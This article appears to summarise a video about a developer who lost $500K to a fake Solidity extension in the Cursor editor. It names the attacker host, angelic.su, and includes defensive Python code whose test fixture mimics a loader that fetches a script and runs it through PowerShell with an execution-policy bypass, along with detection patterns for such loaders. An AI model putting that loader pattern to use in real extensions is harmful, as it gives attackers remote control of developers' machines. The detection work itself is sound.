
$500K Crypto Hack: The Danger of VS Code Extensions & AI Code Editors

Summary

Quick Abstract

A blockchain developer lost $500,000 after installing a malicious extension in the Cursor IDE. The case exposes a structural weakness in modern coding environments: the extension marketplace is trusted, yet an extension runs with the full privileges of the developer. This summary explains how the attackers used that trust to distribute malware, why AI-powered VS Code forks and their open-source extension registries are exposed, and how a routine extension install can end in a drained wallet.

Quick Takeaways:

  • Malware disguised as a legitimate Solidity extension stole cryptocurrency.

  • Attackers gamed the Open VSX marketplace ranking system.

  • Cursor, a VS Code fork, uses Open VSX, a less-vetted marketplace.

  • Extensions have extensive system-level access, creating security risks.

Practical protections: use Microsoft's Visual Studio Marketplace for initial vetting, scrutinize publishers, be wary of newly published extensions, and compartmentalize sensitive development work. The IDE extension ecosystem demands caution.

The Incident

In June 2025, a seasoned blockchain developer ran into a nightmare. After wiping his computer and setting up his development environment from scratch, he started coding in Cursor, an AI-based editor and a fork of VS Code. A few days later, when he checked one of his crypto wallets, half a million dollars' worth of cryptocurrency had vanished without his knowledge.

The Investigation

The developer, careful and experienced, couldn't figure out how this had happened. His computer had a fresh Windows install, and he hadn't visited any sketchy websites or downloaded cracked software. He reached out to the security company Kaspersky. Its researchers found a small piece of malicious code executing inside his Cursor IDE: a file called extension.js in the extensions folder inside his user profile directory. On load it reached out to a server at angelic.su, downloaded a PowerShell script, and executed it, giving the attackers full access to his machine.

The Malicious Extension

The malicious code was part of a Solidity language extension the developer had installed from the Cursor extension marketplace. When the researchers opened extension.js, the file the extension host loads as the extension's entry point, they found it provided none of the language support it advertised. Instead it ran every time the extension loaded, silently downloading and executing the script from the remote server. The PowerShell script first checked for ScreenConnect, a legitimate remote access tool. If it wasn't installed, the script downloaded and installed a copy configured to talk to the attacker's servers, giving them complete remote control over the developer's machine.

How the Malicious Extension Got Through

The attacker copied the description of the legitimate Solidity extension and published a fake one to the marketplace Cursor uses. When the developer searched for Solidity, the malicious extension was fourth in the results and the legitimate one eighth. Cursor's marketplace is backed by Open VSX, whose relevance ranking weighs factors such as download count, last update date, rating, and verification status. The attackers gamed that ranking by pushing an update to the fake extension two weeks after the legitimate one's last update. The fake also showed a substantial download count (54,000), a number that is easy to inflate and that made it look established.

The Aftermath

The malicious extension was caught, reported, and removed from the marketplace on July 2nd. The next day the attackers were back with a new one carrying the same name as the legitimate extension and an inflated download count of 2 million. They also used a lookalike publisher name: a capital I in place of a lowercase l, which most fonts render almost identically, so the two were hard to tell apart at a glance.
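A lookalike publisher ID is cheap to catch once you compare the glyphs rather than the bytes. The Python below is an added example, not code from the video or from Kaspersky's report: it folds visually confusable characters to a common skeleton and classifies a candidate publisher against an allowlist of publishers you have already vetted. The publisher names are constructed, and the confusable table is deliberately small; extend it (for example from the Unicode confusables data) before relying on it.

```python
import unicodedata

# Visually confusable characters mapped to a canonical form.
# Constructed, deliberately incomplete table for this example.
CONFUSABLES = {
    "I": "l",       # capital i vs lowercase L, the swap used in the incident
    "1": "l",
    "|": "l",
    "0": "o",
    "\u0430": "a",  # Cyrillic a
    "\u0435": "e",  # Cyrillic ie
    "\u043e": "o",  # Cyrillic o
    "\u0440": "p",  # Cyrillic er
    "\u0441": "c",  # Cyrillic es
}

# Publisher IDs the developer has vetted (constructed example allowlist).
TRUSTED_PUBLISHERS = {"blockdev-labs", "acme-tools"}


def skeleton(name: str) -> str:
    """Reduce a publisher ID to a 'what it looks like' form.

    NFKC folds full-width and other compatibility variants, the confusable
    table folds lookalike glyphs, and lowercasing comes last so that a
    capital I is folded to l before case information is discarded.
    """
    folded = unicodedata.normalize("NFKC", name)
    return "".join(CONFUSABLES.get(ch, ch) for ch in folded).lower()


def classify_publisher(publisher: str, trusted=TRUSTED_PUBLISHERS) -> str:
    """'trusted' (exact match), 'lookalike' (renders like a trusted ID but
    is not one) or 'unknown' (no resemblance to anything on the allowlist)."""
    if publisher in trusted:
        return "trusted"
    if skeleton(publisher) in {skeleton(t) for t in trusted}:
        return "lookalike"
    return "unknown"


if __name__ == "__main__":
    candidates = ("blockdev-labs", "bIockdev-Iabs", "b1ockdev-labs",
                  "bl\u043eckdev-labs", "someone-else")
    for candidate in candidates:
        print(f"{candidate!r:22} -> {classify_publisher(candidate)}")
```

A "lookalike" verdict should block the install outright: an ID that renders like one you trust but is not byte-identical has no legitimate reason to exist. Run the check against the publisher field of the extension you are about to install, not against the display name shown in search results, since the display name is free text the publisher controls.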

The Role of Open VSX

Cursor, as a fork of VS Code, cannot use Microsoft's Visual Studio Marketplace, whose terms restrict it to Microsoft's own products. Instead it uses Open VSX, a community-run registry hosted by the Eclipse Foundation. Microsoft's marketplace has review staff, automated malware scanning, and strict publisher policies. Open VSX is run by a smaller team with a more open publishing model, which makes it easier for an attacker to get a fake extension listed.

The Nature of IDE Extensions

IDE extensions need deep access to be useful. In VS Code and its forks, an extension is Node.js code loaded into the extension host process; it runs with the full privileges of the user running the editor and can read, write, create, and delete files, spawn processes, and reach the network. There is no permission manifest to declare or deny any of this. Browser extensions, by contrast, run in a sandbox and must request specific permissions; an IDE extension effectively has the whole computer.

The Gap Between Source Code and Installed Extensions

Even when an extension is open source with its code on GitHub, what you install is a compiled, packaged artifact (a .vsix) built and uploaded by the publisher. Nothing ties that package to a particular commit of the repository, so malicious code can be added during the build or packaging step while the public source stays clean. This has happened to VS Code extensions, npm packages, and Python libraries alike.
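Because the installed artifact, not the repository, is what runs, the thing to inspect is the .vsix itself. The Python below is an added example, not code from the video, from Kaspersky's report, or from any marketplace tooling: it opens a .vsix (a zip whose extension/ directory holds package.json and the compiled code), follows the package.json main field to the entry point the extension host will load, and flags loader indicators of the kind described in the incident above: a child_process import, a PowerShell invocation, an ExecutionPolicy bypass, remote URLs, and dynamic code evaluation. It also reports whether the extension activates on every editor startup. Both packages and their entry scripts are constructed fixtures built in memory; the package names, publisher IDs and URL are invented, and the vsixmanifest a real package also carries is omitted because the scan does not need it.

```python
import io
import json
import posixpath
import re
import zipfile

# Patterns a language extension has no business containing in its entry point.
# Absence of a match is not a clean bill of health: a loader can be obfuscated.
INDICATORS = {
    "child_process": re.compile(r"\brequire\(\s*['\"]child_process['\"]\s*\)"),
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.IGNORECASE),
    "execution_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.IGNORECASE),
    "dynamic_eval": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
}
REMOTE_URL = re.compile(r"https?://[^\s'\"`)]+")


def entry_member(main_field: str) -> str:
    """Map package.json 'main' (e.g. './out/extension.js') to its zip member name."""
    return "extension/" + posixpath.normpath(main_field)


def build_vsix(package_json: dict, entry_source: str) -> bytes:
    """Build a minimal .vsix in memory (constructed fixture: no vsixmanifest)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension/package.json", json.dumps(package_json))
        zf.writestr(entry_member(package_json["main"]), entry_source)
    return buf.getvalue()


def inspect_vsix(data: bytes) -> dict:
    """Scan the entry point that the extension host will actually load."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        pkg = json.loads(zf.read("extension/package.json"))
        main = pkg.get("main")
        source = zf.read(entry_member(main)).decode("utf-8", "replace") if main else ""
    events = pkg.get("activationEvents", [])
    # "*" and onStartupFinished run the code on every launch, before any
    # file of the advertised language is even opened.
    activates_on_startup = "*" in events or "onStartupFinished" in events
    indicators = [name for name, rx in INDICATORS.items() if rx.search(source)]
    urls = REMOTE_URL.findall(source)
    loader_like = any(i in indicators for i in ("child_process", "powershell", "dynamic_eval"))
    return {
        "id": f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}",
        "entry": main,
        "activates_on_startup": activates_on_startup,
        "indicators": indicators,
        "urls": urls,
        "verdict": "suspicious" if loader_like else "no loader indicators",
    }


# Constructed fixtures: an entry point shaped like the loader described above,
# and a benign one that only registers a language feature.
SUSPICIOUS_PKG = {
    "name": "example-lang", "publisher": "bIockdev-Iabs", "version": "0.0.1",
    "main": "./out/extension.js", "activationEvents": ["*"],
    "contributes": {"languages": [{"id": "example"}]},
}
SUSPICIOUS_ENTRY = """\
const { exec } = require("child_process");
const https = require("https");
function activate() {
  // fetches a script and hands it to PowerShell; no language support at all
  https.get("https://example.invalid/update.ps1", (res) => { /* ... */ });
  exec("powershell.exe -ExecutionPolicy Bypass -File update.ps1");
}
module.exports = { activate };
"""

CLEAN_PKG = {
    "name": "example-lang", "publisher": "blockdev-labs", "version": "0.0.1",
    "main": "./out/extension.js", "activationEvents": ["onLanguage:example"],
    "contributes": {"languages": [{"id": "example"}]},
}
CLEAN_ENTRY = """\
const vscode = require("vscode");
function activate(context) {
  context.subscriptions.push(
    vscode.languages.registerHoverProvider("example", { provideHover() { return null; } })
  );
}
module.exports = { activate };
"""


if __name__ == "__main__":
    for pkg, src in ((SUSPICIOUS_PKG, SUSPICIOUS_ENTRY), (CLEAN_PKG, CLEAN_ENTRY)):
        print(json.dumps(inspect_vsix(build_vsix(pkg, src)), indent=2))
```

For a real package, pass the bytes of a downloaded .vsix to inspect_vsix before installing it, and read the entry file yourself when the verdict is anything but boring: a minified or obfuscated entry point for a language extension is itself a reason to stop. The scan deliberately targets the file named in main because that, not the repository's src/ tree, is what runs at activation.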

Protecting Yourself

  • Install VS Code alongside your preferred fork. Install new extensions in VS Code from Microsoft's Visual Studio Marketplace, test them there, and only then install them in your fork. Note the limit of this check: the copy your fork installs from Open VSX is a separate upload, so confirm that the publisher ID and version match on both marketplaces before installing it.

  • If an extension doesn't work as promised, uninstall it immediately.

  • Check the publisher of the extension. Look at their profile, how long they have been publishing, what else they have made, and whether the publisher ID matches the one you expect character for character.

  • Be cautious with new extensions. Wait for others to try them out and for problems to surface.

  • Compartmentalize your work. Install only the extensions you absolutely need, especially on machines used for sensitive projects, and keep wallets and other secrets off the machine you experiment on. Separate your work and personal activities.

Conclusion

The software ecosystem is evolving, and with it comes new security challenges. We need to change how we think about trust in software. While most extensions are useful and developers are honest, attackers are becoming more sophisticated. By staying informed, being cautious, and taking practical steps to protect ourselves, we can continue to build great things while minimizing the risk of falling victim to malicious extensions.
